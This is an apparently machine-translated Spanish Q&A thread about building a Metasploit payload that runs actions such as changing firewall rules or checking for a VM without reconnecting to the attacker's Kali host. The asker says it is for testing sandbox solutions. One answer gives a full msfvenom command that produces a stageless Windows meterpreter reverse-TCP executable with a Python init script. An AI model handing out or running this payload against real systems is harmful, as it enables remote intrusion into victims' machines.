¿Cómo puedo agregar módulos a una carga útil en Metasploit?

3

Sé cómo crear cargas útiles con Metasploit y luego escribir un script de AutoRun, por lo que cuando la máquina víctima se conecta de nuevo a mi servidor Kali, ejecuta algunas acciones. Funciona dulce!

Lo que quería hacer es crear una carga útil armada con acciones (crear proceso, cambiar reglas de firewall, verificar VM, etc.) para poder ejecutar acciones sin necesidad de volver a conectarme a mi host Kali.

¿Sabe si esto es posible con Metasploit o Meterpreter? En caso de que no sea posible, ¿hay alguna aplicación que pueda usar para crear cargas útiles independientes?

Esto es para un POC y la intención es probar la efectividad de algunas soluciones de sandboxing.

    
pregunta Frosa 08.02.2015 - 16:00
fuente

2 respuestas

2

No estoy seguro de cuánto está familiarizado con el ecosistema Meterpreter, pero si tiene algo de experiencia, esto debería ser fácil de lograr a través de los enlaces de python en el medidor sin etapas.

El contador de pasos sin etapas tiene un atributo llamado EXITINIT que se puede establecer en cualquier script de Python arbitrario y la sesión ejecutará los comandos incluso antes de que se contacte con el controlador. Para que esto funcione, es importante que la extensión de Python esté cargada. Ambas tareas se pueden lograr a través de:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> EXTENSIONS=stdapi,priv,python EXTINIT=python,/root/met.py -f exe -o met-stageless.exe

Como se puede ver, las EXTENSIONES están configuradas para cargar python, que se integrarán en el EXE generado, mientras que EXITINIT cargará la extensión de python (de manera predeterminada solo se carga stapi) y ejecutará los comandos especificados en / root / met archivo .py. Si puede codificar una acción en python (casi cualquier cosa), puede ejecutarla a través de la extensión de python.

    
respondido por el void_in 04.02.2016 - 10:23
fuente
0

No tengo experiencia real, pero ¿qué tal esto de los documentos de Metasploit:

  • Staged Stager : las cargas útiles funcionan junto con las cargas útiles de la etapa en Para realizar una tarea específica. Un stager establece un Canal de comunicación entre el atacante y la víctima y lee. en una carga útil de etapa para ejecutar en el host remoto.

Pero no puedo averiguar si necesita estar conectado con la víctima o no. Ejecuta las cargas útiles en un orden determinado según la forma en que se ejecutó localmente la etapa anterior, o la decisión se toma en tu máquina, y por lo tanto, debes estar conectado.

    
respondido por el user1164108 08.02.2015 - 19:43
fuente

Lea otras preguntas en las etiquetas